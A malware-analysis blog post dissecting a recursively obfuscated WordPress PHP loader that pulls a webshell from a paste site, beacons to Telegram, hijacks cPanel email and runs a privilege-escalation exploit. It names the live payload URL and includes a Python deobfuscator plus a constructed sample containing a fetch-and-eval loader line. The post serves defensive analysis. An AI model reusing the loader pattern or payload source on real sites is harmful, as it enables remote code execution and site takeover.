---
title: "Unveiling Paste.ee Served PHP Malware: Recursive Deobfuscation cPanel Hijacks Telegram Notifications"
date: 2025-01-05
author: "Shiv"
featured_image: "https://malcure.com/wp-content/uploads/2025/01/unveiling-pasteee-served-php-malware-recursive-deobfuscation-cpanel-hijacks-telegram-notifications-scaled.jpg"
categories:
  - name: "News"
    url: "/blog/news.md"
---

# Unveiling Paste.ee Served PHP Malware: Recursive Deobfuscation cPanel Hijacks Telegram Notifications

A stealthy, recurring WordPress malware that is recursively obfuscated and fetches a webshell from Paste.ee (a free, easy-to-use Pastebin alternative), allowing a full system hijack including control over the website's control panel, can be quite shocking.

Let’s dig in.

## Original Obfuscated Malware

Here’s the original code:

![](https://malcure.com/wp-content/uploads/2025/01/pastee-malware-o.png)

## Deobfuscation Iteration 1

This decodes into:

![](https://malcure.com/wp-content/uploads/2025/01/pastee-malware-c.png)

## Fetching Random CVE Exploit from GitHub

The above code fetches the next stage of the malware from https://paste.ee/r/ztSOp/0. Since the contents of this URL can be updated at any time, the same loader can be used to inject other malware.

![](https://malcure.com/wp-content/uploads/2025/01/pastee-malware-u.png)

## The Webshell with Telegram Notification to the Attacker

This finally decodes into a powerful webshell. Here's the code that notifies the attacker via Telegram:

![](https://malcure.com/wp-content/uploads/2025/01/pastee-malware-t.png)

## Malicious cPanel Email Update

Here's the bit that resets the cPanel contact email so that the attacker can gain access to the cPanel account.

![](https://malcure.com/wp-content/uploads/2025/01/pastee-malware-cp.png)

And finally, the bit that exploits a CVE such as https://github.com/berdav/CVE-2021-4034. Since the contents of https://paste.ee/r/ztSOp/0 can be updated, the CVE could differ for each attack.

![](https://malcure.com/wp-content/uploads/2025/01/pastee-malware-g.png)

This is a nasty piece of malware, and the only reliable remedy is to create a WordPress / data backup, get a new hosting account, clean the data offline to prevent reinfection, and then restore the cleaned data.

### Decoding The ASCII Bits

One small thing left to deobfuscate is the ASCII-code string construction.

![](https://malcure.com/wp-content/uploads/2025/01/pastee-malware-d.png)

## Automating Deobfuscation & Decoding

A deobfuscator was created to automate the decoding of this malware, since the original infection used looped obfuscation with nested iterations. It can be found at:

[https://github.com/MalcureCyber/malcure\_malware\_decoder](https://github.com/MalcureCyber/malcure_malware_decoder)
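As an added illustration of the recursive peeling such a tool has to do (this is example code written for this post, not the malcure_malware_decoder code), the Python below statically unwraps nested eval() layers built from base64_decode, gzinflate and str_rot13, folds the chr()-assembled strings from the ASCII section above, stops at the layer that would need the network, and then scans the result for indicators. The sample it decodes is constructed inline; the paste.ee path, the Telegram host string and the indicator names are assumptions, not values from the infection.

```python
import base64, codecs, re, zlib

DECODERS = {  # the PHP decoders this sample chains; latin-1 carries raw bytes through gzinflate
    "base64_decode": lambda s: base64.b64decode(s).decode("latin-1"),
    "gzinflate": lambda s: zlib.decompress(s.encode("latin-1"), -15).decode("latin-1"),
    "str_rot13": lambda s: codecs.encode(s, "rot_13"),
}
CALL = re.compile(r"^\s*(base64_decode|gzinflate|str_rot13)\s*\((.*)\)\s*$", re.S)
LITERAL = re.compile(r"^\s*(['\"])(.*)\1\s*$", re.S)
EVAL = re.compile(r"eval\s*\((.*)\)\s*;", re.S)
CHR_RUN = re.compile(r"chr\(\d+\)(?:\s*\.\s*chr\(\d+\))*")
INDICATORS = {"paste_site": r"paste\.ee/", "telegram_beacon": r"api\.telegram\.org/bot"}

def decode_chain(expr, used):
    """Statically evaluate a str_rot13(base64_decode('...')) chain; None if not decodable."""
    lit = LITERAL.match(expr)
    if lit:
        return lit.group(2)
    m = CALL.match(expr)
    value = decode_chain(m.group(2), used) if m else None
    if value is not None:
        used.append(m.group(1))
        return DECODERS[m.group(1)](value)
def fold_chr(code):
    """Rebuild strings assembled as chr(104).chr(116)... into plain PHP literals."""
    def repl(m):
        text = "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0)))
        return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"
    return CHR_RUN.sub(repl, code)
def deobfuscate(code, max_layers=32):
    """Peel nested eval() layers; stops at one that needs the network, e.g. eval(file_get_contents(...))."""
    used = []
    for _ in range(max_layers):
        m = EVAL.search(code)
        inner = decode_chain(m.group(1), used) if m else None
        if inner is None:
            break
        code = inner
    return fold_chr(code), used  # (final code, decoder names in the order applied)
def indicators(code):
    return sorted(name for name, pat in INDICATORS.items() if re.search(pat, code))

# Constructed sample (not the real malware): paste.ee fetcher under three eval() layers + chr() strings.
INNER = ("<?php $s = chr(104).chr(116).chr(116).chr(112).chr(115); $t = $s.'://api.telegram.org/bot';"
         " eval(file_get_contents($s.'://paste.ee/r/EXAMPLE/0')); ?>")
_b64 = lambda b: base64.b64encode(b).decode()
_deflate = lambda s: zlib.compress(s.encode())[2:-4]  # strip zlib header/adler32 = raw deflate
LAYER1 = "eval(base64_decode('%s'));" % _b64(INNER.encode())
LAYER2 = "eval(gzinflate(base64_decode('%s')));" % _b64(_deflate(LAYER1))
SAMPLE = "<?php eval(str_rot13(base64_decode('%s'))); ?>" % _b64(codecs.encode(LAYER2, "rot_13").encode())
```

Running `deobfuscate(SAMPLE)` returns the readable fetcher and the five decoder steps it passed through; `indicators(...)` on that result flags both the paste site and the Telegram host.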

**Alert:** The script is still nascent and should only be used in a sandbox environment for educational purposes.